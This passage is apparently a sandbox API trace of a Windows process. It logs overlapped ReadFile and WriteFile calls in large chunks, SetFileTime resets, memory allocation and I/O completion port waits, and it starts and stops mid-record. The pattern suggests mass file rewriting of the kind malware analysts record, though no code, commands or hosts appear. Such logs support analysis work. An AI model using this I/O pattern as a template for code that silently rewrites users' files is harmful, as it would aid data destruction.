GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0083.360] WriteFile (in: hFile=0x3c4, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0083.360] GetLastError () returned 0x3e5 [0083.360] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0086.553] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0086.553] CloseHandle (hObject=0x3b0) returned 1 [0086.554] free (_Block=0x20abae0) [0086.554] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0086.563] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x59d, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0086.563] GetLastError () returned 0x3e5 [0086.563] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0086.565] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0086.565] CloseHandle (hObject=0x3c0) returned 1 [0086.569] free (_Block=0x206b860) [0086.569] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0086.597] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0xdb, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0086.597] GetLastError () returned 0x3e5 [0086.597] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0086.597] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0086.597] CloseHandle (hObject=0x3c0) returned 1 [0086.598] free (_Block=0x206b860) [0086.599] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0087.564] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0087.565] CloseHandle (hObject=0x3b0) returned 1 [0087.565] free (_Block=0x20abae0) [0087.565] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0087.592] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0087.592] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0087.592] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0087.593] free (_Block=0x2060778) [0087.593] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0087.593] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0087.593] free (_Block=0x2062da0) [0087.593] free (_Block=0x53fcc0) [0087.593] free (_Block=0x2062eb8) [0087.593] WriteFile (in: hFile=0x3c0, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0087.594] GetLastError () returned 0x3e5 [0087.594] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0087.594] WriteFile (in: hFile=0x3c0, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0087.594] GetLastError () returned 0x3e5 [0087.595] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0087.625] WriteFile (in: hFile=0x3c4, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x3a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0087.625] GetLastError () returned 0x3e5 [0087.625] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0087.960] WriteFile (in: hFile=0x3b0, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0087.960] GetLastError () returned 0x3e5 [0087.960] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0088.136] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0088.136] CloseHandle (hObject=0x3b0) returned 1 [0088.144] free (_Block=0x206b860) [0088.144] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0088.406] ReadFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToRead=0xacc, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0088.406] GetLastError () returned 0x3e5 [0088.406] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0088.407] SetFileTime (hFile=0x3c4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0088.407] CloseHandle (hObject=0x3c4) returned 1 [0088.408] free (_Block=0x206b860) [0088.408] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0089.402] ReadFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToRead=0x24f, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0089.402] GetLastError () returned 0x3e5 [0089.402] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0089.402] SetFileTime (hFile=0x3c4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0089.402] CloseHandle (hObject=0x3c4) returned 1 [0089.403] free (_Block=0x206b860) [0089.403] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0089.606] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0089.606] CloseHandle (hObject=0x3b0) returned 1 [0089.607] free (_Block=0x20abae0) [0089.607] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0089.615] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x48e, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0089.615] GetLastError () returned 0x3e5 [0089.615] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0089.616] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0089.616] CloseHandle (hObject=0x3c0) returned 1 [0089.621] free (_Block=0x206b860) [0089.621] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0089.655] ReadFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToRead=0xcf, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0089.655] GetLastError () returned 0x3e5 [0089.655] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0089.655] SetFileTime (hFile=0x3c4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0089.655] CloseHandle (hObject=0x3c4) returned 1 [0089.659] free (_Block=0x206b860) [0089.659] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0090.920] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0090.920] CloseHandle (hObject=0x3c0) returned 1 [0090.920] free (_Block=0x20abae0) [0090.920] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0090.930] ReadFile (in: hFile=0x3c4, lpBuffer=0x206b894, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0090.930] GetLastError () returned 0x3e5 [0090.930] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0090.930] SetFileTime (hFile=0x3c4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0090.930] CloseHandle (hObject=0x3c4) returned 1 [0090.931] free (_Block=0x206b860) [0090.931] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0091.055] SetFileTime (hFile=0x3c4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0091.055] CloseHandle (hObject=0x3c4) returned 1 [0091.055] free (_Block=0x20abae0) [0091.055] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0091.062] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0091.063] GetLastError () returned 0x3e5 [0091.063] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0091.063] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0091.063] CloseHandle (hObject=0x3c0) returned 1 [0091.064] free (_Block=0x206b860) [0091.064] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0091.080] SetFileTime (hFile=0x3c4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0091.080] CloseHandle (hObject=0x3c4) returned 1 [0091.081] free (_Block=0x20abae0) [0091.081] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0091.089] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0091.089] GetLastError () returned 0x3e5 [0091.089] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0091.090] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0091.090] CloseHandle (hObject=0x3c0) returned 1 [0091.091] free (_Block=0x206b860) [0091.091] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0091.209] ReadFile (in: hFile=0x3bc, lpBuffer=0x206b894, nNumberOfBytesToRead=0xb620, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0091.216] GetLastError () returned 0x3e5 [0091.216] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0091.233] SetFileTime (hFile=0x3bc, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0091.233] CloseHandle (hObject=0x3bc) returned 1 [0091.234] free (_Block=0x206b860) [0091.234] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0091.245] ReadFile (in: hFile=0x3c0, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0091.277] GetLastError () returned 0x3e5 [0091.277] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0091.279] SetFileTime (hFile=0x3c0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0091.279] CloseHandle (hObject=0x3c0) returned 1 [0091.468] free (_Block=0x20abae0) [0091.468] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0091.469] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0091.469] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0091.469] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0091.469] free (_Block=0x2060778) [0091.469] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0091.469] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0091.470] free (_Block=0x2062da0) [0091.470] free (_Block=0x53fcc0) [0091.470] free (_Block=0x2062eb8) [0091.470] WriteFile (in: hFile=0x3bc, lpBuffer=0x206b894, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 0x0 [0091.470] GetLastError () returned 0x3e5 [0091.470] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0091.569] WriteFile (in: hFile=0x3bc, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0091.570] GetLastError () returned 0x3e5 [0091.570] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0091.586] ReadFile (in: hFile=0x3c0, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0091.670] GetLastError () returned 0x3e5 [0091.670] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0095.333] ReadFile (in: hFile=0x3c0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0095.737] GetLastError () returned 0x3e5 [0095.737] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0095.774] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0095.774] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0095.774] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0095.774] free (_Block=0x2060778) [0095.774] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0095.774] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0095.775] free (_Block=0x2062da0) [0095.775] free (_Block=0x53fcc0) [0095.775] free (_Block=0x2062eb8) [0095.775] WriteFile (in: hFile=0x3d4, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0095.775] GetLastError () returned 0x3e5 [0095.775] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0095.790] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0095.790] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0095.790] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0095.790] free (_Block=0x2060778) [0095.790] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0095.790] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0095.791] free (_Block=0x2062da0) [0095.791] free (_Block=0x53fcc0) [0095.791] free (_Block=0x2062eb8) [0095.791] WriteFile (in: hFile=0x3d0, lpBuffer=0x20ebe14*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebde0 | out: lpBuffer=0x20ebe14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20ebde0) returned 1 [0095.792] GetLastError () returned 0x3e5 [0095.792] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58) returned 1 [0095.794] WriteFile (in: hFile=0x3d4, lpBuffer=0x394007c*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3940048) returned 1 [0095.796] GetLastError () returned 0x3e5 [0095.796] GetQueuedCompletionStatus (CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2e0fc4c, lpCompletionKey=0x2e0fc5c, lpOverlapped=0x2e0fc58, dwMilliseconds=0xffffffff) Thread: id = 14 os_tid = 0xfac [0072.122] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0076.571] memcpy (in: _Dst=0x41cfbc, _Src=0x2f4f95c, _Size=0x2 | out: _Dst=0x41cfbc) returned 0x41cfbc [0076.571] memcpy (in: _Dst=0x41cfbe, _Src=0x2f4f928, _Size=0x20 | out: 